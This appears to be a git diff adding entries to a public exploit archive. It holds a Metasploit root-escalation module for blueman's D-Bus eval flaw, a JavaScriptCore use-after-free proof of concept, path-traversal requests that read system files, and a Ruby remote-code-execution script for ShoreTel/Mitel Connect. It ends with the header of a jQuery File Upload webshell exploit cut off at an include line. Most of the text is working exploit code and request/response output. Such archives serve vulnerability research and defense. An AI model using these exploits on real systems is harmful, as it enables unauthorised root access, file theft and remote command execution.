"\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x0a\x34\x35\x36" + + "\x37\x38\x39\x0a\x0a\x0a\x26\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" + + "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a" + + "\x42\x42\x42\x54\x42\x42\x41\x41\x41\x34\x41\x41\x42\x42\x42\x42" + + "\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41" + + "\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a" + + "\x41\x41\x41\x41\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x25\x42" + + "\x42\x41\x41\x41\x0a\xae\x4a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x08" + + "\x0a\x2b\x0a\x0a\x0a\x34\x35\x36\x37\x38\x39\x0a\x0a\x0a\x26\x0a" + + "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" + + "\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a\x42\x42\x42\x54\x42\x42\x41\x41" + + "\x41\x34\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41" + + "\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a" + + "\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x41\x41\x41\x41\x57\x41\x42\x42" + + "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x0a\x42\x42\x42" + + "\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x41\x41\x41\x43" + + "\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a" + + "\x0a\x0a\x05\xff\xff\x05\x0a\x64\x1b\x0a\x0a\x0a\x2b\x0a\x0a\x0a" + + "\x0a\x0a\x41\x41\x41\x41\x41\x41\x41\x41\x41\x33\x34\x00\x00\x00" + + "\x80\x39\x30\x20\x32\x33\x34\x35\x36\x37\x38\x39\x30\x41\x5b\x41" + + "\x00\x00\x00\x01\x8f\x2c\x6e\x5b\x49\xe7\xa0\x78\xa1\x9b\x50\xf5" + + "\xb2\x18\x04\x00") + +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(buf, ('127.0.0.1', 123)) \ No newline at end of file diff --git a/exploits/linux/local/46186.rb b/exploits/linux/local/46186.rb new file mode 100755 index 000000000..53d5a56d9 --- /dev/null +++ b/exploits/linux/local/46186.rb @@ -0,0 +1,161 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'blueman set_dhcp_handler D-Bus Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges by exploiting a Python + code injection vulnerability in blueman versions prior to 2.0.3. + + The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the + `set_dhcp_handler` function which uses user input in a call to `eval`, + without sanitization, resulting in arbitrary code execution as root. + + This module has been tested successfully with blueman version 1.23 + on Debian 8 Jessie (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'the grugq', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2015-12-18', + 'References' => + [ + ['BID', '79688'], + ['CVE', '2015-8612'], + ['URL', 'https://twitter.com/thegrugq/status/677809527882813440'], + ['URL', 'https://github.com/blueman-project/blueman/issues/416'], + ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'], + ['URL', 'https://www.debian.org/security/2015/dsa-3427'], + ['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'], + ['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultTarget' => 0)) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + chmod path + end + + def dbus_send(dest:, type:, path:, interface:, contents:) + cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}" + end + + def check + unless command_exists? 'dbus-send' + vprint_error 'dbus-send is not installed. Exploitation will fail.' + return CheckCode::Safe + end + vprint_good 'dbus-send is installed' + + res = dbus_send( + dest: 'org.blueman.Mechanism', + type: 'method_call', + path: '/', + interface: 'org.freedesktop.DBus.Introspectable.Introspect', + contents: '' + ) + + unless res.include? 'EnableNetwork' + vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available' + return CheckCode::Safe + end + vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available' + + res = execute_python('') + unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)' + vprint_error 'Target is not vulnerable' + return CheckCode::Safe + end + + CheckCode::Vulnerable + end + + def execute_python(code) + dbus_send( + dest: 'org.blueman.Mechanism', + type: 'method_call', + path: '/', + interface: 'org.blueman.Mechanism.EnableNetwork', + contents: "'string:[]' 'string:[]' 'string:#{code}'" + ) + end + + def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 10..15}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + print_status 'Executing payload...' + res = execute_python "os.system(\"#{payload_path}&\")" + vprint_line res + + unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)' + fail_with Failure::NotVulnerable, 'The target is not vulnerable' + end + + if res.include? 'SyntaxError:' + fail_with Failure::Unknown, 'Payload execution failed due to syntax error' + end + end +end \ No newline at end of file diff --git a/exploits/multiple/dos/46181.html b/exploits/multiple/dos/46181.html new file mode 100644 index 000000000..fdbac0830 --- /dev/null +++ b/exploits/multiple/dos/46181.html @@ -0,0 +1,34 @@ + + + + + + + + + \ No newline at end of file diff --git a/exploits/multiple/dos/46183.js b/exploits/multiple/dos/46183.js new file mode 100644 index 000000000..204bc0a89 --- /dev/null +++ b/exploits/multiple/dos/46183.js @@ -0,0 +1,58 @@ +/* +The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF. + +PoC: +*/ + +function gc() { + for (let i = 0; i < 10; i++) { + new ArrayBuffer(1024 * 1024 * 10); + } +} + +function opt(arr) { + let r = /a/; + let o = {}; + + arr[0].charAt(0); + arr[1].charAt(0); + arr[2].charAt(0); + arr[3].charAt(0); + arr[4].charAt(0); + arr[5].charAt(0); + arr[6].charAt(0); + arr[7].charAt(0); + arr[8].charAt(0); + arr[8].charAt(0); + arr[9].charAt(0); + + o.x = 'a'.match(r); + + return o; +} + +function main() { + for (let i = 0; i < 10000; i++) { + opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]); + } + + let a = 'a'.repeat(1024 * 1024 * 2); + let b = 'a'.repeat(1024 * 1024 * 2); + + let arr = []; + for (let i = 0; i < 10; i++) { + arr[i] = a + b; + } + + gc(); + + let o = opt(arr); + + gc(); + + let tmp = [1234]; + + print(o.x); // 1234 +} + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/46172.txt b/exploits/php/webapps/46172.txt new file mode 100644 index 000000000..c3e05dd6b --- /dev/null +++ b/exploits/php/webapps/46172.txt @@ -0,0 +1,38 @@ +# Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Download +# Dork: N/A +# Date: 2019-01-16 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.roxyfileman.com/ +# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php +# Version: 1.4.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/fileman/php/download.php?f=/[PATH]/fileman/Uploads/[FILE] +# + +GET /[PATH]/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6; GeniXCMS-Installation=rsb95ndeo38fi0qo5376ku0o74; GeniXCMS-uxTCOmgGby9cYrSEFhS2=iuac7ooh77hghvbq7afkn0kl13; roxyld=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads; roxyview=list +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Tue, 15 Jan 2019 22:19:32 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Disposition: attachment; filename="win.ini" +Content-Length: 564 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/46173.txt b/exploits/php/webapps/46173.txt new file mode 100644 index 000000000..fa64da605 --- /dev/null +++ b/exploits/php/webapps/46173.txt @@ -0,0 +1,38 @@ +# Exploit Title: doorGets CMS 7.0 - Arbitrary File Download +# Dork: N/A +# Date: 2019-01-16 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.doorgets.com/ +# Software Link: https://netix.dl.sourceforge.net/project/doorgets-cms/doorGets%20CMS%20V7/doorGets_CMS_V7.0.zip +# Version: 7.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/fileman/php/download.php?f=/[PATH]/fileman/Uploads/[FILE] +# + +GET /[PATH]/fileman/php/download.php?f=%2FExploitDb%2FdoorGets_CMS_V7.0%2Ffileman%2FUploads%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6; GeniXCMS-Installation=rsb95ndeo38fi0qo5376ku0o74; GeniXCMS-uxTCOmgGby9cYrSEFhS2=iuac7ooh77hghvbq7afkn0kl13; roxyld=%2FExploitDb%2FdoorGets_CMS_V7.0%2Ffileman%2FUploads; roxyview=list +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Tue, 15 Jan 2019 22:03:21 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Disposition: attachment; filename="win.ini" +Content-Length: 564 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/46174.txt b/exploits/php/webapps/46174.txt new file mode 100644 index 000000000..cf67e9edb --- /dev/null +++ b/exploits/php/webapps/46174.txt @@ -0,0 +1,66 @@ +# Exploit Title: ShoreTel / Mitel Connect ONSITE ST14.2 Remote Code Execution +# Google Dork: +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0 +# Date: 01-01-2019 +# Exploit Author: twosevenzero +# Vendor Homepage: https://www.mitel.com/ +# Version: 19.49.5200.0 (and very likely many others prior and after) +# CVE : CVE-2018-5782 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5782) + +Description +=========== +There are multiple vulnerabilities in ShoreTel/Mitel Connect ONSITE ST 14.2 +which, when chained together, result in remote code execution in the +context of the running service. The vendor was contacted by Jared McLaren +of SecureWorks in early 2018 but a proof of concept was not released. I had +access to a single device during the development of this exploit. As such, +your system paths may be different and you may need to edit this script to +fit your needs. + +Solution +======== +The vendor has released a response stating that the newest versions are not +affected. Please see their response for upgrade instructions. + +https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0004 + +#!/usr/bin/env ruby + +require "base64" +require "methadone" +require "faraday" + +include Methadone::Main +include Methadone::CLILogging + +main do |base_url,command| + + cmd_b64 = Base64.strict_encode64(command.strip) + + conn = Faraday.new(:url => base_url.strip) + res = conn.get do |req| + req.url "/scripts/vsethost.php", + { + :hostId => "system", + :keyCode => "base64_decode", + :meetingType => "{${gKeyCode}($gSessionDir)}", + :sessionDir => cmd_b64, + :swfServer => "{${gHostID}($gMeetingType)}", + :server => "exec", + :dir => "/usr/share/apache2/htdocs/wc2_deploy/scripts/" + } + end + + rce = conn.get do |req| + req.url "/scripts/vmhost.php" + end + + print rce.body.to_s +end + +version "0.1.0" +description "Shoretel/Mitel Connect Onsite ST 14.2 Remote Code Execution PoC" + +arg :base_url, "URL of vulnerable Connect Onsite ST 14.2 Installation." +arg :command, "Command to run." + +go! \ No newline at end of file diff --git a/exploits/php/webapps/46182.py b/exploits/php/webapps/46182.py new file mode 100755 index 000000000..1883b416f --- /dev/null +++ b/exploits/php/webapps/46182.py @@ -0,0 +1,103 @@ +# Exploit Title: Exploit for Blueimp's jQuery File Upload <= 9.22.0 CVE-2018-9206 +# Google Dork: inurl: /jquery-file-upload/server/php +# Date: 1/15/2019 +# Exploit Author: Larry W. Cashdollar +# Vendor Homepage: http://www.vapidlabs.com +# Software Link: [download link if available] +# Version: <= 9.22.0 +# Tested on: Linux +# CVE : CVE-2018-9206 + + +/*Exploits CVE-2018-9206 to install a webshell.*/ +/*http://www.vapidlabs.com/advisory.php?v=204 */ +/*$ gcc main.c -o blue_exploit */ +/*Larry W. Cashdollar @_larry0*/ + +#include